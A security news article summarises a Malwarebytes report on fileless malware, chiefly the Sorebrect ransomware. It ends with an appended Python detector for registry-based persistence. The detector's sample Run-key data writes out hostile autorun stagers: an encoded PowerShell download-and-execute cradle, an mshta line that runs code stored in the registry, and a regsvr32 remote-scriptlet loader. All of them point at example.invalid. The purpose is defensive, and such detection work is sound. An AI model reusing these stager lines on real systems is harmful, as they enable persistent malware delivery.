Malwarebytes Fileless Ransomware: An emerging threat to the United States


A new Malwarebytes report examines Sorebrect, a fileless ransomware threat detected in the US, alongside three other fileless attacks seen this year.

According to a new Malwarebytes report, a completely fileless ransomware known as Sorebrect is “one of the first of its kind” to combine traditional ransomware functionality with fileless tactics.

In “Under the Radar: The Future of Undetected Malware,” Malwarebytes detailed four fileless attacks observed throughout 2018: Emotet, TrickBot, SamSam and Sorebrect. The report cites a Ponemon Institute study which states that “fileless malware attacks are estimated to account for 35 percent of all attacks in 2018 and are nearly 10 times more likely to succeed than file-based attacks.” For example, Malwarebytes stated that “Emotet malware was detected and removed more than 1.5 million times using Malwarebytes between January and September 2018.”

While Emotet was most active in the United States, an increase in activity was also seen globally, in countries such as the United Kingdom, the Philippines and Canada.

Within the United States, Texas was one of Emotet's biggest targets. Adam Kujawa, Director of Malware Intelligence at Malwarebytes, based in Santa Clara, California, said he believes this is because Texas has a large population, a number of military bases and a growing technology industry.

Sorebrect has also reached the United States. It was first seen in the Middle East in 2017, where it infected the networks of mainly manufacturing companies. But Malwarebytes said the fileless ransomware was found this year in several states, including Missouri and Tennessee. “For us, this threat has not been very widespread and we have not yet seen any copycats of this feature making large splashes,” the report said.

“However, it’s just a matter of time before someone perfects this infection method and using a computer becomes a bigger risk.” Kujawa said Sorebrect combines traditional ransomware features with fileless tactics and targets network shares. “Right now, the most popular ransomware, GandCrab, has all sorts of abilities. The fact is, however, that [Sorebrect] is a new development in ransomware, something we haven’t seen before. And in the near future it is almost certain to be copied,” said Kujawa. “The main form of infection for fileless malware is either via an exploit script or via a malicious Office document. In either case, it allows the ransomware to stay in memory without putting anything on disk and hang around for as long as it wants, until it decides to start encrypting things.”

The risk Sorebrect poses becomes clearer when one considers that it does not need a person to start it. Although its delivery mechanism is not fully known, Kujawa said the fileless ransomware is believed to be distributed partly through exploit kits and malicious spam campaigns.

“When it’s on the system, what usually happens with any kind of fileless malware is that it finds a way to persist. Otherwise it’s gone once you restart your computer,” said Kujawa. “So, in many cases they will create malformed registry entries or keys and store code in them. And every time the computer reboots, the code reaches out, picks up the malware and reinfects the system.

With Sorebrect, since it can encrypt everything, I imagine that it probably becomes known after the initial infection, once it begins to encrypt.” To protect against threats such as fileless ransomware, the report recommends that companies extend their current protection beyond signature-based malware detection to include behavioral detection.
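As an added example that is not part of the original article or the Malwarebytes report, the following Python script shows what a defender can look for given the registry-resident persistence Kujawa describes: it walks a constructed snapshot of a HKCU Run key, decodes PowerShell -EncodedCommand payloads (Base64 over UTF-16LE), and flags values that combine a script host or LOLBin with a download cradle, a registry read-back, or in-memory execution. The sample entries, the example.invalid URLs, the rule set and the two-signal threshold are all assumptions of this example, not anything attributed to Sorebrect.

```python
import base64
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample of a HKCU\...\Run key, as "reg query" would list it.  Nothing here
# comes from the Malwarebytes report: the three malicious values are hypothetical stagers
# of the kind the article describes (code kept in the registry that re-fetches the payload
# at every logon), and example.invalid is a reserved, non-resolving domain.
DECODED_STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"
# PowerShell's -EncodedCommand takes Base64 over the UTF-16LE bytes of the script text.
ENCODED_STAGER = base64.b64encode(DECODED_STAGER.encode("utf-16-le")).decode("ascii")

SAMPLE_RUN_KEY: Dict[str, str] = {
    "OneDrive": r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
    "SecurityHealth": r"C:\Windows\system32\SecurityHealthSystray.exe",
    "Updater": f"powershell.exe -NoP -W Hidden -Enc {ENCODED_STAGER}",
    "Helper": r'mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell -c (gp HKCU:\Software\Classes\x).y | iex"",0")',
    "Loader": r"regsvr32 /s /n /u /i:http://example.invalid/payload.sct scrobj.dll",
}

# -e / -ec / -enc / -EncodedCommand followed by a Base64 blob (16+ chars, to skip short flags).
ENC_FLAG = re.compile(r"(?i)(?:^|\s)[-/](?:encodedcommand|enc|ec|en|e)\s+([A-Za-z0-9+/=]{16,})")
LOLBIN = re.compile(r"(?i)\b(?:powershell|pwsh|mshta|wscript|cscript|rundll32|regsvr32|cmd)(?:\.exe)?\b")
CRADLE = re.compile(r"(?i)downloadstring|downloadfile|net\.webclient|invoke-webrequest|\biwr\b|start-bitstransfer|https?://")
REG_READBACK = re.compile(r"(?i)\b(?:get-itemproperty|gp|getvalue|reg\s+query)\b|hk(?:cu|lm):|hkey_")
INMEM = re.compile(r"(?i)\biex\b|invoke-expression|vbscript:|javascript:|scrobj\.dll|/i:|-w(?:indowstyle)?\s+hidden|-nop(?:rofile)?\b")


@dataclass
class Finding:
    value_name: str
    reasons: List[str]
    decoded: Optional[str] = None  # decoded -EncodedCommand text, if the value had one


def decode_encoded_command(b64: str) -> Optional[str]:
    """Decode a PowerShell -EncodedCommand argument; None if it is not valid Base64/UTF-16LE."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError subclass
        return None


def analyze_value(name: str, data: str) -> Optional[Finding]:
    """Score one autorun value; return a Finding only when at least two independent signals fire."""
    reasons: List[str] = []
    decoded = None
    text = data
    m = ENC_FLAG.search(data)
    if m:
        decoded = decode_encoded_command(m.group(1))
        reasons.append("base64-encoded PowerShell command")
        # Scan the decoded script instead of the blob so the other rules see the real command.
        text = data[: m.start()] + " " + (decoded or "")
    if LOLBIN.search(text):
        reasons.append("script host / LOLBin launched at logon")
    if CRADLE.search(text):
        reasons.append("download cradle")
    if REG_READBACK.search(text):
        reasons.append("reads code back from the registry")
    if INMEM.search(text):
        reasons.append("in-memory / script execution")
    if len(reasons) < 2:
        return None  # one weak hint (e.g. a URL in a legitimate updater) is not worth an alert
    return Finding(name, reasons, decoded)


def scan_run_key(values: Dict[str, str]) -> List[Finding]:
    """Run analyze_value over every (name, data) pair and keep the hits, in key order."""
    return [f for f in (analyze_value(n, d) for n, d in values.items()) if f]


if __name__ == "__main__":
    for finding in scan_run_key(SAMPLE_RUN_KEY):
        print(f"[!] {finding.value_name}: {', '.join(finding.reasons)}")
        if finding.decoded:
            print(f"    decoded: {finding.decoded}")
```

On a live host the same function can be fed the output of `reg query` or `Get-ItemProperty` over the Run, RunOnce and Winlogon keys (and any other autostart location an EDR or Autoruns enumerates). The two-signal threshold is what keeps a legitimate updater that merely contains a URL from alerting, and the decoded stager is the artifact worth handing to incident response, since with a fileless sample there may be no file on disk to submit.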

In addition, Malwarebytes suggested that companies focus more on blocking threat delivery mechanisms, especially email, and on using security products with self-protection that prevent malware from disabling them or removing them from a system.

Mark Funk
Mark Funk is an experienced information security specialist who works with enterprises to mature and improve their enterprise security programs. Previously, he worked as a security news reporter.